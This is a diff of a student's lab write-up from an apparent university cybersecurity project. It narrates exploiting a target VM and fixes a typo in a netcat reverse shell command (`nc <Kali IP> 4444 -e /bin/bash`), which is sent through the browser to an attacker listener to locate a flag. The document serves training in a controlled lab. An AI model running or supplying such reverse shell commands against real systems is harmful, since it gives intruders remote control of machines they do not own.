soojilee88/-UofT-Cybersecurity_Project3/OffensiveTemplate.md

       - Next, used this exploit to open backdoor reverse shell on the target.
 So on Kali VM, netcat listner was started:

         ![netcat](Images/Offensive/netcat.png)
-      - In the browser, command `nc<Kali IP> 4444 -e /bin/bash` was used to connect the reverse shell
+      - In the browser, command `nc <Kali IP> 4444 -e /bin/bash` was used to connect the reverse shell
       ![netcat2](Images/Offensive/netcat2.png)
       ![netcat3](Images/Offensive/netcat3.png)
-      - using the shell opened, flag 2 was located.
+      - using the shell opened, flag 2 was located. <br>
       ![FLAG2_2](Images/Offensive/flag2_2.png)